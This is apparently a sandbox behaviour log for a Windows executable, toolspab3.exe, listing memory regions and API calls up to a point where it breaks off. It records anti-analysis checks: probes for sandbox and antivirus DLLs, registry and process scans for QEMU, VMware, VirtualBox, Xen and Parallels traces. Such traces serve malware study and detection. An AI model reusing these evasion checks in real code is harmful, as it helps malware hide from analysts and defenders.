region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 371 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 372 start_va = 0x750000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 373 start_va = 0x8e0000 end_va = 0x1cdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 374 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 375 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 376 start_va = 0x1ce0000 end_va = 0x1e5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 377 start_va = 0x310000 end_va = 0x315fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 378 start_va = 0x320000 end_va = 0x324fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 809 start_va = 0x3c0000 end_va = 0x3d5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Thread: id = 2 os_tid = 0xe5c [0066.202] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="kernel32" | out: DestinationString="kernel32") [0066.202] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x769b0000) returned 0x0 [0066.202] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="user32" | out: DestinationString="user32") [0066.202] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x773b0000) returned 0x0 [0066.295] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="advapi32" | out: DestinationString="advapi32") [0066.295] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x76c20000) returned 0x0 [0066.295] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="shell32" | out: DestinationString="shell32") [0066.295] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x75cb0000) returned 0x0 [0070.548] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0070.552] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x214778 [0070.552] GetKeyboardLayoutList (in: nBuff=1, lpList=0x214778 | out: lpList=0x214778) returned 1 [0070.553] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fb14 | out: TokenHandle=0x18fb14*=0x74) returned 1 [0070.553] GetTokenInformation (in: TokenHandle=0x74, TokenInformationClass=0x19, TokenInformation=0x18fb18, TokenInformationLength=0x14, ReturnLength=0x18fb10 | out: TokenInformation=0x18fb18, ReturnLength=0x18fb10) returned 1 [0070.553] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x18fd54, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0070.553] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0070.600] CreateFileMappingW (hFile=0x78, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x7c [0070.601] MapViewOfFile (hFileMappingObject=0x7c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1ce0000 [0070.602] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd58, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\toolspab3.exe")) returned 0x28 [0070.602] wcsstr (_Str="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe", _SubStr="7869.vmt") returned 0x0 [0070.602] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x18ff54, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x18ff54, ResultLength=0x0) returned 0x0 [0070.603] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x18ff5c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18ff5c, ReturnLength=0x0) returned 0x0 [0070.603] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0070.603] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0070.603] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0070.603] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x214788 [0070.603] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0070.603] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0070.603] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0070.603] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0070.603] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x214898 [0070.604] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x214898, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x214898, ResultLength=0x18ff50) returned 0x0 [0070.604] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0070.604] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x2148d0 [0070.604] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x2148d0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x2148d0, ResultLength=0x18ff50) returned 0x0 [0070.605] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="qemu") returned 0x0 [0070.605] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="virtio") returned 0x0 [0070.605] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vmware") returned 0x0 [0070.605] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vbox") returned 0x0 [0070.605] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="xen") returned 0x0 [0070.606] LocalFree (hMem=0x2148d0) returned 0x0 [0070.606] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0070.606] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x2148d0 [0070.606] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x2148d0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x2148d0, ResultLength=0x18ff50) returned 0x0 [0070.607] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="qemu") returned 0x0 [0070.607] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="virtio") returned 0x0 [0070.607] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vmware") returned 0x0 [0070.607] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vbox") returned 0x0 [0070.607] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="xen") returned 0x0 [0070.608] LocalFree (hMem=0x2148d0) returned 0x0 [0070.608] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0070.608] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x2148d0 [0070.608] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x2148d0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x2148d0, ResultLength=0x18ff50) returned 0x0 [0070.609] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="qemu") returned 0x0 [0070.609] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="virtio") returned 0x0 [0070.609] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vmware") returned 0x0 [0070.609] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vbox") returned 0x0 [0070.609] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="xen") returned 0x0 [0070.610] LocalFree (hMem=0x2148d0) returned 0x0 [0070.610] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0070.610] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x2148d0 [0070.610] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x2148d0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x2148d0, ResultLength=0x18ff50) returned 0x0 [0070.612] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="qemu") returned 0x0 [0070.612] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="virtio") returned 0x0 [0070.612] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vmware") returned 0x0 [0070.612] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vbox") returned 0x0 [0070.612] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="xen") returned 0x0 [0070.612] LocalFree (hMem=0x2148d0) returned 0x0 [0070.612] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0070.612] LocalAlloc (uFlags=0x40, uBytes=0x7a) returned 0x2148d0 [0070.612] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x2148d0, Length=0x7a, ResultLength=0x18ff50 | out: KeyInformation=0x2148d0, ResultLength=0x18ff50) returned 0x0 [0070.613] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="qemu") returned 0x0 [0070.614] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="virtio") returned 0x0 [0070.614] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vmware") returned 0x0 [0070.614] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vbox") returned 0x0 [0070.614] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="xen") returned 0x0 [0070.614] LocalFree (hMem=0x2148d0) returned 0x0 [0070.614] LocalFree (hMem=0x214898) returned 0x0 [0070.614] NtClose (Handle=0x80) returned 0x0 [0070.615] LocalFree (hMem=0x214788) returned 0x0 [0070.615] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x214788 [0070.615] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0070.615] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0070.615] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0070.615] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0070.615] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x214898 [0070.615] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x214898, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x214898, ResultLength=0x18ff50) returned 0x0 [0070.615] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0070.615] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x2148d0 [0070.615] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x2148d0, Length=0x50, ResultLength=0x18ff50 | out: KeyInformation=0x2148d0, ResultLength=0x18ff50) returned 0x0 [0070.616] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="qemu") returned 0x0 [0070.616] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="virtio") returned 0x0 [0070.616] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vmware") returned 0x0 [0070.616] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vbox") returned 0x0 [0070.616] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="xen") returned 0x0 [0070.616] LocalFree (hMem=0x2148d0) returned 0x0 [0070.616] LocalFree (hMem=0x214898) returned 0x0 [0070.616] NtClose (Handle=0x80) returned 0x0 [0070.617] LocalFree (hMem=0x214788) returned 0x0 [0070.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0x12b08) returned 0xc0000004 [0070.623] LocalAlloc (uFlags=0x40, uBytes=0x13b08) returned 0x2149d0 [0070.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2149d0, Length=0x13b08, ResultLength=0x18ff5c | out: SystemInformation=0x2149d0, ResultLength=0x18ff5c*=0xe990) returned 0x0 [0070.626] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0070.626] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0070.626] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0070.626] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0070.626] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0070.627] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0070.627] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0070.627] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.627] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0070.627] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0070.627] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.627] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.627] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.627] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.627] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.627] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0070.627] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0070.627] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.627] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.627] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.627] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.627] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.628] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.628] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0070.628] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0070.628] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.628] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.628] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.628] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.628] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.628] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0070.628] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0070.628] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.628] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.628] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.628] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.628] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.628] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0070.628] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0070.628] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.628] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.628] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.628] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.628] wcsstr (_Str="lsm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.628] wcsstr (_Str="lsm.exe", _SubStr="qga.exe") returned 0x0 [0070.628] wcsstr (_Str="lsm.exe", _SubStr="windanr.exe") returned 0x0 [0070.628] wcsstr (_Str="lsm.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.628] wcsstr (_Str="lsm.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.628] wcsstr (_Str="lsm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.629] wcsstr (_Str="lsm.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.629] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.630] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.631] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.631] wcsstr (_Str="explorer.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.631] wcsstr (_Str="explorer.exe", _SubStr="qga.exe") returned 0x0 [0070.631] wcsstr (_Str="explorer.exe", _SubStr="windanr.exe") returned 0x0 [0070.631] wcsstr (_Str="explorer.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.631] wcsstr (_Str="explorer.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.631] wcsstr (_Str="explorer.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.631] wcsstr (_Str="explorer.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.631] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.631] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0070.631] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0070.631] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.631] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.631] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.631] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.631] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.631] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0070.631] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0070.631] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.631] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.631] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.631] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.631] wcsstr (_Str="spoolsv.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.631] wcsstr (_Str="spoolsv.exe", _SubStr="qga.exe") returned 0x0 [0070.631] wcsstr (_Str="spoolsv.exe", _SubStr="windanr.exe") returned 0x0 [0070.631] wcsstr (_Str="spoolsv.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.631] wcsstr (_Str="spoolsv.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.631] wcsstr (_Str="spoolsv.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.632] wcsstr (_Str="spoolsv.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.632] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.632] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0070.632] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0070.632] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.632] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.632] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.632] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.632] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.632] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0070.632] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0070.632] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0070.632] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0070.632] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0070.632] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0070.632] wcsstr (_Str="officeclicktorun.exe", _SubStr="qemu-ga.exe") returned 0x0 [0070.632] wcsstr (_Str="officeclicktorun.exe", _SubStr="qga.exe") returned 0x0 [0070.632] wcsstr 